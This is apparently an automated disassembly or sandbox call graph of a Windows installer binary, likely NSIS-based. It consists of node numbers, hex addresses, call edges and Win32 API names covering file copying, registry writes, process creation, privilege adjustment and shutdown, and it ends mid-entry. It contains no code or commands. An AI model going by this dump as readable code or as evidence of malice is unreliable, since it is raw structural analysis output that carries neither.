4158 4061cb wsprintfW 4155->4158 4158->4157 3719 403359 SetErrorMode GetVersion 3720 403398 3719->3720 3721 40339e 3719->3721 3722 40665e 5 API calls 3720->3722 3723 4065ee 3 API calls 3721->3723 3722->3721 3724 4033b4 lstrlenA 3723->3724 3724->3721 3725 4033c4 3724->3725 3726 40665e 5 API calls 3725->3726 3727 4033cb 3726->3727 3728 40665e 5 API calls 3727->3728 3729 4033d2 3728->3729 3730 40665e 5 API calls 3729->3730 3731 4033de #17 OleInitialize SHGetFileInfoW 3730->3731 3809 406284 lstrcpynW 3731->3809 3734 40342a GetCommandLineW 3810 406284 lstrcpynW 3734->3810 3736 40343c 3737 405b86 CharNextW 3736->3737 3738 403461 CharNextW 3737->3738 3739 40358b GetTempPathW 3738->3739 3746 40347a 3738->3746 3811 403328 3739->3811 3741 4035a3 3742 4035a7 GetWindowsDirectoryW lstrcatW 3741->3742 3743 4035fd DeleteFileW 3741->3743 3747 403328 12 API calls 3742->3747 3821 402edd GetTickCount GetModuleFileNameW 3743->3821 3744 405b86 CharNextW 3744->3746 3746->3744 3751 403574 3746->3751 3754 403576 3746->3754 3749 4035c3 3747->3749 3748 403611 3752 4036b4 3748->3752 3757 405b86 CharNextW 3748->3757 3805 4036c4 3748->3805 3749->3743 3750 4035c7 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3749->3750 3755 403328 12 API calls 3750->3755 3751->3739 3849 403974 3752->3849 3905 406284 lstrcpynW 3754->3905 3756 4035f5 3755->3756 3756->3743 3756->3805 3774 403630 3757->3774 3761 4037fe 3763 403882 ExitProcess 3761->3763 3764 403806 GetCurrentProcess OpenProcessToken 3761->3764 3762 4036de 3765 4058ea MessageBoxIndirectW 3762->3765 3766 403852 3764->3766 3767 40381e LookupPrivilegeValueW AdjustTokenPrivileges 3764->3767 3771 4036ec ExitProcess 3765->3771 3773 40665e 5 API calls 3766->3773 3767->3766 3769 4036f4 3772 405855 5 API calls 3769->3772 3770 40368e 3906 405c61 3770->3906 3777 4036f9 lstrcatW 3772->3777 3778 403859 3773->3778 3774->3769 3774->3770 3779 403715 lstrcatW lstrcmpiW 3777->3779 3780 40370a lstrcatW 3777->3780 3781 40386e ExitWindowsEx 3778->3781 3784 40387b 3778->3784 3783 403731 3779->3783 3779->3805 3780->3779 3781->3763 3781->3784 3786 403736 3783->3786 3787 40373d 3783->3787 3788 40140b 2 API calls 3784->3788 3785 4036a9 3921 406284 lstrcpynW 3785->3921 3790 4057bb 4 API calls 3786->3790 3791 405838 2 API calls 3787->3791 3788->3763 3792 40373b 3790->3792 3793 403742 SetCurrentDirectoryW 3791->3793 3792->3793 3794 403752 3793->3794 3795 40375d 3793->3795 3929 406284 lstrcpynW 3794->3929 3930 406284 lstrcpynW 3795->3930 3798 4062a6 17 API calls 3799 40379c DeleteFileW 3798->3799 3800 4037a9 CopyFileW 3799->3800 3804 40376b 3799->3804 3800->3804 3801 4037f2 3803 40604a 36 API calls 3801->3803 3803->3805 3804->3798 3804->3801 3806 4062a6 17 API calls 3804->3806 3807 40586d 2 API calls 3804->3807 3808 4037dd CloseHandle 3804->3808 3931 40604a MoveFileExW 3804->3931 3922 40389a 3805->3922 3806->3804 3807->3804 3808->3804 3809->3734 3810->3736 3812 406518 5 API calls 3811->3812 3813 403334 3812->3813 3814 40333e 3813->3814 3815 405b59 3 API calls 3813->3815 3814->3741 3816 403346 3815->3816 3817 405838 2 API calls 3816->3817 3818 40334c 3817->3818 3935 405da9 3818->3935 3939 405d7a GetFileAttributesW CreateFileW 3821->3939 3823 402f1d 3842 402f2d 3823->3842 3940 406284 lstrcpynW 3823->3940 3825 402f43 3941 405ba5 lstrlenW 3825->3941 3829 402f54 GetFileSize 3830 403050 3829->3830 3848 402f6b 3829->3848 3946 402e79 3830->3946 3832 403059 3834 403089 GlobalAlloc 3832->3834 3832->3842 3958 403311 SetFilePointer 3832->3958 3833 4032fb ReadFile 3833->3848 3957 403311 SetFilePointer 3834->3957 3835 4030bc 3839 402e79 6 API calls 3835->3839 3838 4030a4 3841 403116 35 API calls 3838->3841 3839->3842 3840 403072 3843 4032fb ReadFile 3840->3843 3846 4030b0 3841->3846 3842->3748 3845 40307d 3843->3845 3844 402e79 6 API calls 3844->3848 3845->3834 3845->3842 3846->3842 3846->3846 3847 4030ed SetFilePointer 3846->3847 3847->3842 3848->3830 3848->3833 3848->3835 3848->3842 3848->3844 3850 40665e 5 API calls 3849->3850 3851 403988 3850->3851 3852 4039a0 3851->3852 3853 40398e 3851->3853 3854 406152 3 API calls 3852->3854 3967 4061cb wsprintfW 3853->3967 3855 4039d0 3854->3855 3856 4039ef lstrcatW 3855->3856 3858 406152 3 API calls 3855->3858 3859 40399e 3856->3859 3858->3856 3959 403c4a 3859->3959 3862 405c61 18 API calls 3863 403a21 3862->3863 3864 403ab5 3863->3864 3866 406152 3 API calls 3863->3866 3865 405c61 18 API calls 3864->3865 3867 403abb 3865->3867 3868 403a53 3866->3868 3869 403acb LoadImageW 3867->3869 3872 4062a6 17 API calls 3867->3872 3868->3864 3876 403a74 lstrlenW 3868->3876 3880 405b86 CharNextW 3868->3880 3870 403b71 3869->3870 3871 403af2 RegisterClassW 3869->3871 3875 40140b 2 API calls 3870->3875 3873 403b7b 3871->3873 3874 403b28 SystemParametersInfoW CreateWindowExW 3871->3874 3872->3869 3873->3805 3874->3870 3879 403b77 3875->3879 3877 403a82 lstrcmpiW 3876->3877 3878 403aa8 3876->3878 3877->3878 3881 403a92 GetFileAttributesW 3877->3881 3882 405b59 3 API calls 3878->3882 3879->3873 3885 403c4a 18 API calls 3879->3885 3883 403a71 3880->3883 3884 403a9e 3881->3884 3886 403aae 3882->3886 3883->3876 3884->3878 3887 405ba5 2 API calls 3884->3887 3888 403b88 3885->3888 3968 406284 lstrcpynW 3886->3968 3887->3878 3890 403b94 ShowWindow 3888->3890 3891 403c17 3888->3891 3893 4065ee 3 API calls 3890->3893 3892 4053bf 5 API calls 3891->3892 3894 403c1d 3892->3894 3895 403bac 3893->3895 3896 403c21 3894->3896 3897 403c39 3894->3897 3898 403bba GetClassInfoW 3895->3898 3900 4065ee 3 API calls 3895->3900 3896->3873 3904 40140b 2 API calls 3896->3904 3899 40140b 2 API calls 3897->3899 3901 403be4 DialogBoxParamW 3898->3901 3902 403bce GetClassInfoW RegisterClassW 3898->3902 3899->3873 3900->3898 3903 40140b 2 API calls 3901->3903 3902->3901 3903->3873 3904->3873 3905->3751 3970 406284 lstrcpynW 3906->3970 3908 405c72 3909 405c04 4 API calls 3908->3909 3910 405c78 3909->3910 3911 40369a 3910->3911 3912 406518 5 API calls 3910->3912 3911->3805 3920 406284 lstrcpynW 3911->3920 3918 405c88 3912->3918 3913 405cb9 lstrlenW 3914 405cc4 3913->3914 3913->3918 3916 405b59 3 API calls 3914->3916 3915 4065c7 2 API calls 3915->3918 3917 405cc9 GetFileAttributesW 3916->3917 3917->3911 3918->3911 3918->3913 3918->3915 3919 405ba5 2 API calls 3918->3919 3919->3913 3920->3785 3921->3752 3923 4038b2 3922->3923 3924 4038a4 CloseHandle 3922->3924 3971 4038df 3923->3971 3924->3923 3929->3795 3930->3804 3932 40606b 3931->3932 3933 40605e 3931->3933 3932->3804 4021 405ed0 3933->4021 3936 405db6 GetTickCount GetTempFileNameW 3935->3936 3937 403357 3936->3937 3938 405dec 3936->3938 3937->3741 3938->3936 3938->3937 3939->3823 3940->3825 3942 405bb3 3941->3942 3943 402f49 3942->3943 3944 405bb9 CharPrevW 3942->3944 3945 406284 lstrcpynW 3943->3945 3944->3942 3944->3943 3945->3829 3947 402e82 3946->3947 3948 402e9a 3946->3948 3949 402e92 3947->3949 3950 402e8b DestroyWindow 3947->3950 3951 402ea2 3948->3951 3952 402eaa GetTickCount 3948->3952 3949->3832 3950->3949 3953 40669a 2 API calls 3951->3953 3954 402eb8 CreateDialogParamW ShowWindow 3952->3954 3955 402edb 3952->3955 3956 402ea8 3953->3956 3954->3955 3955->3832 3956->3832 3957->3838 3958->3840 3960 403c5e 3959->3960 3969 4061cb wsprintfW 3960->3969 3962 403ccf 3963 403d03 18 API calls 3962->3963 3965 403cd4 3963->3965 3964 4039ff 3964->3862 3965->3964 3966 4062a6 17 API calls 3965->3966 3966->3965 3967->3859 3968->3864 3969->3962 3970->3908 3972 4038ed 3971->3972 3973 4038b7 3972->3973 3974 4038f2 FreeLibrary GlobalFree 3972->3974 3975 405996 3973->3975 3974->3973 3974->3974 3976 405c61 18 API calls 3975->3976 3977 4059b6 3976->3977 3978 4059d5 3977->3978 3979 4059be DeleteFileW 3977->3979 3981 405af5 3978->3981 4011 406284 lstrcpynW 3978->4011 3980 4036cd OleUninitialize 3979->3980 3980->3761 3980->3762 3981->3980 3988 4065c7 2 API calls 3981->3988 3983 4059fb 3984 405a01 lstrcatW 3983->3984 3985 405a0e 3983->3985 3986 405a14 3984->3986 3987 405ba5 2 API calls 3985->3987 3989 405a24 lstrcatW 3986->3989 3991 405a2f lstrlenW FindFirstFileW 3986->3991 3987->3986 3990 405b1a 3988->3990 3989->3991 3990->3980 3992 405b59 3 API calls 3990->3992 3991->3981 4005 405a51 3991->4005 3993 405b24 3992->3993 3995 40594e 5 API calls 3993->3995 3994 405ad8 FindNextFileW 3998 405aee FindClose 3994->3998 3994->4005 3997 405b30 3995->3997 3999 405b34 3997->3999 4000 405b4a 3997->4000 3998->3981 3999->3980 4003 4052ec 24 API calls 3999->4003 4002 4052ec 24 API calls 4000->4002 4002->3980 4006 405b41 4003->4006 4004 405996 60 API calls 4004->4005 4005->3994 4005->4004 4007 4052ec 24 API calls 4005->4007 4009 4052ec 24 API calls 4005->4009 4010 40604a 36 API calls 4005->4010 4012 406284 lstrcpynW 4005->4012 4013 40594e 4005->4013 4008 40604a 36 API calls 4006->4008 4007->3994 4008->3980 4009->4005 4010->4005 4011->3983 4012->4005 4014 405d55 2 API calls 4013->4014 4015 40595a 4014->4015 4016 40597b 4015->4016 4017 405971 DeleteFileW 4015->4017 4018 405969 RemoveDirectoryW 4015->4018 4016->4005 4019 405977 4017->4019 4018->4019 4019->4016 4020 405987 SetFileAttributesW 4019->4020 4020->4016 4022 405f00 4021->4022 4023 405f26 GetShortPathNameW 4021->4023 4048 405d7a GetFileAttributesW CreateFileW 4022->4048 4025 406045 4023->4025 4026 405f3b 4023->4026 4025->3932 4026->4025 4028 405f43 wsprintfA 4026->4028 4027 405f0a CloseHandle GetShortPathNameW 4027->4025 4029 405f1e 4027->4029 4030 4062a6 17 API calls 4028->4030 4029->4023 4029->4025 4031 405f6b 4030->4031 4049 405d7a GetFileAttributesW CreateFileW 4031->4049 4033 405f78 4033->4025 4034 405f87 GetFileSize GlobalAlloc 4033->4034 4035 405fa9 4034->4035 4036 40603e CloseHandle 4034->4036 4037 405dfd ReadFile 4035->4037 4036->4025 4038 405fb1 4037->4038 4038->4036 4050 405cdf lstrlenA 4038->4050 4041 405fc8 lstrcpyA 4044 405fea 4041->4044 4042 405fdc 4043 405cdf 4 API calls 4042->4043 4043->4044 4045 406021 SetFilePointer 4044->4045 4046 405e2c WriteFile 4045->4046 4047 406037 GlobalFree 4046->4047 4047->4036 4048->4027 4049->4033 4051 405d20 lstrlenA 4050->4051 4052 405d28 4051->4052 4053 405cf9 lstrcmpiA 4051->4053 4052->4041 4052->4042 4053->4052 4054 405d17 CharNextA 4053->4054 4054->4051 4159 402259 4160 402c41 17 API calls 4159->4160 4161 40225f 4160->4161 4162 402c41 17 API calls 4161->4162 4163 402268 4162->4163 4164 402c41 17 API calls 4163->4164 4165 402271 4164->4165 4166 4065c7 2 API calls 4165->4166 4167 40227a 4166->4167 4168 40228b lstrlenW lstrlenW 4167->4168 4173 40227e 4167->4173 4170 4052ec 24 API calls 4168->4170 4169 4052ec 24 API calls 4172 402286 4169->4172 4171 4022c9 SHFileOperationW 4170->4171 4171->4172 4171->4173 4173->4169 4173->4172 4181 40175c 4182 402c41 17 API calls 4181->4182 4183 401763 4182->4183 4184 405da9 2 API calls 4183->4184 4185 40176a 4184->4185 4185->4185 4186 401d5d GetDlgItem GetClientRect 4187 402c41 17 API calls 4186->4187 4188 401d8f LoadImageW SendMessageW 4187->4188 4189 402ac5 4188->4189 4190 401dad DeleteObject 4188->4190 4190->4189 4191 4022dd 4192 4022e4 4191->4192 4194 4022f7 4191->4194 4193 4062a6 17 API calls 4192->4193 4195 4022f1 4193->4195 4196 4058ea MessageBoxIndirectW 4195->4196 4196->4194 4197 405260 4198 405270 4197->4198 4199 405284 4197->4199 4200 405276 4198->4200 4201 4052cd 4198->4201 4202 40528c IsWindowVisible 4199->4202 4208 4052a3 4199->4208 4204 404247 SendMessageW 4200->4204 4203 4052d2 CallWindowProcW 4201->4203 4202->4201 4205 405299 4202->4205 4206 405280 4203->4206 4204->4206 4210 404bb6 SendMessageW 4205->4210 4208->4203 4215 404c36 4208->4215 4211 404c15 SendMessageW 4210->4211 4212 404bd9 GetMessagePos ScreenToClient SendMessageW 4210->4212 4214 404c0d 4211->4214 4213 404c12 4212->4213 4212->4214 4213->4211 4214->4208 4224 406284 lstrcpynW 4215->4224 4217 404c49 4225 4061cb wsprintfW 4217->4225 4219 404c53 4220 40140b 2 API calls 4219->4220 4221 404c5c 4220->4221 4226 406284 lstrcpynW 4221->4226 4223 404c63 4223->4201 4224->4217 4225->4219 4226->4223 4227 401563 4228 402a6b 4227->4228 4231 4061cb wsprintfW 4228->4231 4230 402a70 4231->4230 3387 4023e4 3388 402c41 17 API calls 3387->3388 3389 4023f6 3388->3389 3390 402c41 17 API calls 3389->3390 3391 402400 3390->3391 3404 402cd1 3391->3404 3394 402ac5 3395 402438 3400 402444 3395->3400 3408 402c1f 3395->3408 3396 402c41 17 API calls 3397 40242e lstrlenW 3396->3397 3397->3395 3399 402463 RegSetValueExW 3402 402479 RegCloseKey 3399->3402 3400->3399 3411 403116 3400->3411 3402->3394 3405 402cec 3404->3405 3432 40611f 3405->3432 3409 4062a6 17 API calls 3408->3409 3410 402c34 3409->3410 3410->3400 3412 40312f 3411->3412 3413 40315a 3412->3413 3448 403311 SetFilePointer 3412->3448 3436 4032fb 3413->3436 3417 403177 GetTickCount 3428 40318a 3417->3428 3418 40329b 3419 40329f 3418->3419 3424 4032b7 3418->3424 3421 4032fb ReadFile 3419->3421 3420 403285 3420->3399 3421->3420 3422 4032fb ReadFile 3422->3424 3423 4032fb ReadFile 3423->3428 3424->3420 3424->3422 3425 405e2c WriteFile 3424->3425 3425->3424 3427 4031f0 GetTickCount 3427->3428 3428->3420 3428->3423 3428->3427 3429 403219 MulDiv wsprintfW 3428->3429 3439 4067df 3428->3439 3446 405e2c WriteFile 3428->3446 3430 4052ec 24 API calls 3429->3430 3430->3428 3433 40612e 3432->3433 3434 402410 3433->3434 3435 406139 RegCreateKeyExW 3433->3435 3434->3394 3434->3395 3434->3396 3435->3434 3449 405dfd ReadFile 3436->3449 3440 406804 3439->3440 3441 40680c 3439->3441 3440->3428 3441->3440 3442 406893 GlobalFree 3441->3442 3443 40689c GlobalAlloc 3441->3443 3444 406913 GlobalAlloc 3441->3444 3445 40690a GlobalFree 3441->3445 3442->3443 3443->3440 3443->3441 3444->3440 3444->3441 3445->3444 3447 405e4a 3446->3447 3447->3428 3448->3413 3450 403165 3449->3450 3450->3417 3450->3418 3450->3420 3495 402868 3496 402c41 17 API calls 3495->3496 3497 40286f FindFirstFileW 3496->3497 3498 402897 3497->3498 3502 402882 3497->3502 3503 4061cb wsprintfW 3498->3503 3500 4028a0 3504 406284 lstrcpynW 3500->3504 3503->3500 3504->3502 4232 404c68 GetDlgItem GetDlgItem 4233 404cba 7 API calls 4232->4233 4248 404ed3 4232->4248 4234 404d50 SendMessageW 4233->4234 4235 404d5d DeleteObject 4233->4235 4234->4235 4236 404d66 4235->4236 4238 404d9d 4236->4238 4241 4062a6 17 API calls 4236->4241 4237 404fb7 4240 405063 4237->4240 4243 404ec6 4237->4243 4251 405010 SendMessageW 4237->4251 4239 4041fb 18 API calls 4238->4239 4242 404db1 4239->4242 4245 405075 4240->4245 4246 40506d SendMessageW 4240->4246 4247 404d7f SendMessageW SendMessageW 4241->4247 4250 4041fb 18 API calls 4242->4250 4252 404262 8 API calls 4243->4252 4244 404f44 4244->4237 4253 404fa9 SendMessageW 4244->4253 4254 405087 ImageList_Destroy 4245->4254 4255 40508e 4245->4255 4262 40509e 4245->4262 4246->4245 4247->4236 4248->4237 4248->4244 4249 404bb6 5 API calls 4248->4249 4249->4244 4265 404dbf 4250->4265 4251->4243 4257 405025 SendMessageW 4251->4257 4258 405259 4252->4258 4253->4237 4254->4255 4259 405097 GlobalFree 4255->4259 4255->4262 4256 40520d 4256->4243 4263 40521f ShowWindow GetDlgItem ShowWindow 4256->4263 4261 405038 4257->4261 4259->4262 4260 404e94 GetWindowLongW SetWindowLongW 4264 404ead 4260->4264 4271 405049 SendMessageW 4261->4271 4262->4256 4275 404c36 4 API calls 4262->4275 4277 4050d9 4262->4277 4263->4243 4266 404eb3 ShowWindow 4264->4266 4267 404ecb 4264->4267 4265->4260 4270 404e0f SendMessageW 4265->4270 4272 404e8e 4265->4272 4273 404e4b SendMessageW 4265->4273 4274 404e5c SendMessageW 4265->4274 4283 404230 SendMessageW 4266->4283 4284 404230 SendMessageW 4267->4284 4270->4265 4271->4240 4272->4260 4272->4264 4273->4265 4274->4265 4275->4277 4276 4051e3 InvalidateRect 4276->4256 4278 4051f9 4276->4278 4279 405107 SendMessageW 4277->4279 4282 40511d 4277->4282 4285 404b71 4278->4285 4279->4282 4281 405191 SendMessageW SendMessageW 4281->4282 4282->4276 4282->4281 4283->4243 4284->4248 4288 404aa8 4285->4288 4287 404b86 4287->4256 4289 404ac1 4288->4289 4290 4062a6 17 API calls 4289->4290 4291 404b25 4290->4291 4292 4062a6 17 API calls 4291->4292 4293 404b30 4292->4293 4294 4062a6 17 API calls 4293->4294 4295 404b46 lstrlenW wsprintfW SetDlgItemTextW 4294->4295 4295->4287 4296 401968 4297 402c1f 17 API calls 4296->4297 4298 40196f 4297->4298 4299 402c1f 17 API calls 4298->4299 4300 40197c 4299->4300 4301 402c41 17 API calls 4300->4301 4302 401993 lstrlenW 4301->4302 4304 4019a4 4302->4304 4303 4019e5 4304->4303 4308 406284 lstrcpynW 4304->4308 4306 4019d5 4306->4303 4307 4019da lstrlenW 4306->4307 4307->4303 4308->4306 4309 40166a 4310 402c41 17 API calls 4309->4310 4311 401670 4310->4311 4312 4065c7 2 API calls 4311->4312 4313 401676 4312->4313 4314 40436b lstrlenW 4315 40438a 4314->4315 4316 40438c WideCharToMultiByte 4314->4316 4315->4316 4317 4046ec 4318 404718 4317->4318 4319 404729 4317->4319 4378 4058ce GetDlgItemTextW 4318->4378 4321 404735 GetDlgItem 4319->4321 4327 404794 4319->4327 4323 404749 4321->4323 4322 404723 4325 406518 5 API calls 4322->4325 4329 40475d SetWindowTextW 4323->4329 4334 405c04 4 API calls 4323->4334 4324 404878 4326 404a27 4324->4326 4380 4058ce GetDlgItemTextW 4324->4380 4325->4319 4333 404262 8 API calls 4326->4333 4327->4324 4327->4326 4330 4062a6 17 API calls 4327->4330 4332 4041fb 18 API calls 4329->4332 4335 404808 SHBrowseForFolderW 4330->4335 4331 4048a8 4336 405c61 18 API calls 4331->4336 4337 404779 4332->4337 4338 404a3b 4333->4338 4339 404753 4334->4339 4335->4324 4340 404820 CoTaskMemFree 4335->4340 4341 4048ae 4336->4341 4342 4041fb 18 API calls 4337->4342 4339->4329 4343 405b59 3 API calls 4339->4343 4344 405b59 3 API calls 4340->4344 4381 406284 lstrcpynW 4341->4381 4345 404787 4342->4345 4343->4329 4346 40482d 4344->4346 4379 404230 SendMessageW 4345->4379 4349 404864 SetDlgItemTextW 4346->4349 4354 4062a6 17 API calls 4346->4354 4349->4324 4350 40478d 4352 40665e 5 API calls 4350->4352 4351 4048c5 4353 40665e 5 API calls 4351->4353 4352->4327 4361 4048cc 4353->4361 4355 40484c lstrcmpiW 4354->4355 4355->4349 4358 40485d lstrcatW 4355->4358 4356 40490d 4382 406284 lstrcpynW 4356->4382 4358->4349 4359 404914 4360 405c04 4 API calls 4359->4360 4362 40491a GetDiskFreeSpaceW 4360->4362 4361->4356 4364 405ba5 2 API calls 4361->4364 4366 404965 4361->4366 4365 40493e MulDiv 4362->4365 4362->4366 4364->4361 4365->4366 4367 4049d6 4366->4367 4368 404b71 20 API calls 4366->4368 4369 4049f9 4367->4369 4371 40140b 2 API calls 4367->4371 4370 4049c3 4368->4370 4383 40421d KiUserCallbackDispatcher 4369->4383 4373 4049d8 SetDlgItemTextW 4370->4373 4374 4049c8 4370->4374 4371->4369 4373->4367 4376 404aa8 20 API calls 4374->4376 4375 404a15 4375->4326 4384 404645 4375->4384 4376->4367 4378->4322 4379->4350 4380->4331 4381->4351 4382->4359 4383->4375 4385 404653 4384->4385 4386 404658 SendMessageW 4384->4386 4385->4386 4386->4326 3632 40176f 3633 402c41 17 API calls 3632->3633 3634 401776 3633->3634 3635 401796 3634->3635 3636 40179e 3634->3636 3674 406284 lstrcpynW 3635->3674 3675 406284 lstrcpynW 3636->3675 3639 4017a9 3676 405b59 lstrlenW CharPrevW 3639->3676 3640 40179c 3643 406518 5 API calls 3640->3643 3654 4017bb 3643->3654 3647 4017cd CompareFileTime 3647->3654 3648 40188d 3649 4052ec 24 API calls 3648->3649 3652 401897 3649->3652 3650 4052ec 24 API calls 3653 401879 3650->3653 3651 406284 lstrcpynW 3651->3654 3655 403116 35 API calls 3652->3655 3654->3647 3654->3648 3654->3651 3658 4062a6 17 API calls 3654->3658 3669 401864 3654->3669 3670 405d55 GetFileAttributesW 3654->3670 3673 405d7a GetFileAttributesW CreateFileW 3654->3673 3679 4065c7 FindFirstFileW 3654->3679 3682 4058ea 3654->3682 3656 4018aa 3655->3656 3657 4018be SetFileTime 3656->3657 3659 4018d0 CloseHandle 3656->3659 3657->3659 3658->3654 3659->3653 3660 4018e1 3659->3660 3661 4018e6 3660->3661 3662 4018f9 3660->3662 3663 4062a6 17 API calls 3661->3663 3664 4062a6 17 API calls 3662->3664 3665 4018ee lstrcatW 3663->3665 3666 401901 3664->3666 3665->3666 3668 4058ea MessageBoxIndirectW 3666->3668 3668->3653 3669->3650 3669->3653 3671 405d74 3670->3671 3672 405d67 SetFileAttributesW 3670->3672 3671->3654 3672->3671 3673->3654 3674->3640 3675->3639 3677 4017af lstrcatW 3676->3677 3678 405b75 lstrcatW 3676->3678 3677->3640 3678->3677 3680 4065dd FindClose 3679->3680 3681 4065e8 3679->3681 3680->3681 3681->3654 3683 4058ff 3682->3683 3684 40594b 3683->3684 3685 405913 MessageBoxIndirectW 3683->3685 3684->3654 3685->3684 4387 4027ef 4388 4027f6 4387->4388 4390 402a70 4387->4390 4389 402c1f 17 API calls 4388->4389 4391 4027fd 4389->4391 4392 40280c SetFilePointer 4391->4392 4392->4390 4393 40281c 4392->4393 4395 4061cb wsprintfW 4393->4395 4395->4390 4396 401a72 4397 402c1f 17 API calls 4396->4397 4398 401a7b 4397->4398 4399 402c1f 17 API calls 4398->4399 4400 401a20 4399->4400 3687 401573 3688 401583 ShowWindow 3687->3688 3689 40158c 3687->3689 3688->3689 3690 402ac5 3689->3690 3691 40159a ShowWindow 3689->3691 3691->3690 4408 402df3 4409 402e05 SetTimer 4408->4409 4411 402e1e 4408->4411 4409->4411 4410 402e73 4411->4410 4412 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4412 4412->4410 4413 401cf3 4414 402c1f 17 API calls 4413->4414 4415 401cf9 IsWindow 4414->4415 4416 401a20 4415->4416 4417 4014f5 SetForegroundWindow 4418 402ac5 4417->4418 4419 402576 4420 402c41 17 API calls 4419->4420 4421 40257d 4420->4421 4424 405d7a GetFileAttributesW CreateFileW 4421->4424 4423 402589 4424->4423 3696 401b77 3697 401b84 3696->3697 3698 401bc8 3696->3698 3699 4022e4 3697->3699 3705 401b9b 3697->3705 3700 401bf2 GlobalAlloc 3698->3700 3701 401bcd 3698->3701 3702 4062a6 17 API calls 3699->3702 3703 4062a6 17 API calls 3700->3703 3709 401c0d 3701->3709 3717 406284 lstrcpynW 3701->3717 3704 4022f1 3702->3704 3703->3709 3711 4058ea MessageBoxIndirectW 3704->3711 3715 406284 lstrcpynW 3705->3715 3708 401bdf GlobalFree 3708->3709 3710 401baa 3716 406284 lstrcpynW 3710->3716 3711->3709 3713 401bb9 3718 406284 lstrcpynW 3713->3718 3715->3710 3716->3713 3717->3708 3718->3709 4425 4024f8 4426 402c81 17 API calls 4425->4426 4427 402502 4426->4427 4428 402c1f 17 API calls 4427->4428 4429 40250b 4428->4429 4430 402533 RegEnumValueW 4429->4430 4431 402527 RegEnumKeyW 4429->4431 4433 40288b 4429->4433 4432 402548 RegCloseKey 4430->4432 4431->4432 4432->4433 4435 40167b 4436 402c41 17 API calls 4435->4436 4437 401682 4436->4437 4438 402c41 17 API calls 4437->4438 4439 40168b 4438->4439 4440 402c41 17 API calls 4439->4440 4441 401694 MoveFileW 4440->4441 4442 4016a0 4441->4442 4443 4016a7 4441->4443 4444 401423 24 API calls 4442->4444 4445 4065c7 2 API calls 4443->4445 4447 402250 4443->4447 4444->4447 4446 4016b6 4445->4446 4446->4447 4448 40604a 36 API calls 4446->4448 4448->4442 4449 401e7d 4450 402c41 17 API calls 4449->4450 4451 401e83 4450->4451 4452 402c41 17 API calls 4451->4452 4453 401e8c 4452->4453 4454 402c41 17 API calls 4453->4454 4455 401e95 4454->4455 4456 402c41 17 API calls 4455->4456 4457 401e9e 4456->4457 4458 401423 24 API calls 4457->4458 4459 401ea5 4458->4459 4466 4058b0 ShellExecuteExW 4459->4466 4461 401ee7 4462 40670f 5 API calls 4461->4462 4464 40288b 4461->4464 4463 401f01 CloseHandle 4462->4463 4463->4464 4466->4461 4467 4019ff 4468 402c41 17 API calls 4467->4468 4469 401a06 4468->4469 4470 402c41 17 API calls 4469->4470 4471 401a0f 4470->4471 4472 401a16 lstrcmpiW 4471->4472 4473 401a28 lstrcmpW 4471->4473 4474 401a1c 4472->4474 4473->4474 4475 401000 4476 401037 BeginPaint GetClientRect 4475->4476 4477 40100c DefWindowProcW 4475->4477 4479 4010f3 4476->4479 4480 401179 4477->4480 4481 401073 CreateBrushIndirect FillRect DeleteObject 4479->4481 4482 4010fc 4479->4482 4481->4479 4483 401102 CreateFontIndirectW 4482->4483 4484 401167 EndPaint 4482->4484 4483->4484 4485 401112 6 API calls 4483->4485 4484->4480 4485->4484 4493 401503 4494 40150b 4493->4494 4496 40151e 4493->4496 4495 402c1f 17 API calls 4494->4495 4495->4496 3451 402104 3452 402c41 17 API calls 3451->3452 3453 40210b 3452->3453 3454 402c41 17 API calls 3453->3454 3455 402115 3454->3455 3456 402c41 17 API calls 3455->3456 3457 40211f 3456->3457 3458 402c41 17 API calls 3457->3458 3459 402129 3458->3459 3460 402c41 17 API calls 3459->3460 3462 402133 3460->3462 3461 402172 CoCreateInstance 3466 402191 3461->3466 3462->3461 3463 402c41 17 API calls 3462->3463 3463->3461 3464 401423 24 API calls 3465 402250 3464->3465 3466->3464 3466->3465 4497 402484 4498 402c81 17 API calls 4497->4498 4499 40248e 4498->4499 4500 402c41 17 API calls 4499->4500 4501 402497 4500->4501 4502 4024a2 RegQueryValueExW 4501->4502 4503 40288b 4501->4503 4504 4024c2 4502->4504 4507 4024c8 RegCloseKey 4502->4507 4504->4507 4508 4061cb wsprintfW 4504->4508 4507->4503 4508->4507 3467 401f06 3468 402c41 17 API calls 3467->3468 3469 401f0c 3468->3469 3470 4052ec 24 API calls 3469->3470 3471 401f16 3470->3471 3482 40586d CreateProcessW 3471->3482 3474 401f3f CloseHandle 3478 40288b 3474->3478 3477 401f31 3479 401f41 3477->3479 3480 401f36 3477->3480 3479->3474 3490 4061cb wsprintfW 3480->3490 3483 4058a0 CloseHandle 3482->3483 3484 401f1c 3482->3484 3483->3484 3484->3474 3484->3478 3485 40670f WaitForSingleObject 3484->3485 3486 406729 3485->3486 3487 40673b GetExitCodeProcess 3486->3487 3491 40669a 3486->3491 3487->3477 3490->3474 3492 4066b7 PeekMessageW 3491->3492 3493 4066c7 WaitForSingleObject 3492->3493 3494 4066ad DispatchMessageW 3492->3494 3493->3486 3494->3492 3563 40230c 3564 402314 3563->3564 3565 40231a 3563->3565 3566 402c41 17 API calls 3564->3566 3567 402c41 17 API calls 3565->3567 3569 402328 3565->3569 3566->3565 3567->3569 3568 402336 3571 402c41 17 API calls 3568->3571 3569->3568 3570 402c41 17 API calls 3569->3570 3570->3568 3572 40233f WritePrivateProfileStringW 3571->3572 3573 401f8c 3574 402c41 17 API calls 3573->3574 3575 401f93 3574->3575 3576 40665e 5 API calls 3575->3576 3577 401fa2 GetFileVersionInfoSizeW 3576->3577 3578 402ac5 3577->3578 3579 401fbe GlobalAlloc 3577->3579 3579->3578 3580 401fd2 3579->3580 3581 40665e 5 API calls 3580->3581 3582 401fd9 3581->3582 3583 40665e 5 API calls 3582->3583 3585 401fe3 3583->3585 3584 402026 3584->3578 3585->3584 3589 4061cb wsprintfW 3585->3589 3587 402018 3590 4061cb wsprintfW 3587->3590 3589->3587 3590->3584 4509 40190c 4510 401943 4509->4510 4511 402c41 17 API calls 4510->4511 4512 401948 4511->4512 4513 405996 67 API calls 4512->4513 4514 401951 4513->4514 3598 40238e 3599 4023c1 3598->3599 3600 402396 3598->3600 3602 402c41 17 API calls 3599->3602 3610 402c81 3600->3610 3604 4023c8 3602->3604 3615 402cff 3604->3615 3605 4023a7 3608 402c41 17 API calls 3605->3608 3607 4023d5 3609 4023ae RegDeleteValueW RegCloseKey 3608->3609 3609->3607 3611 402c41 17 API calls 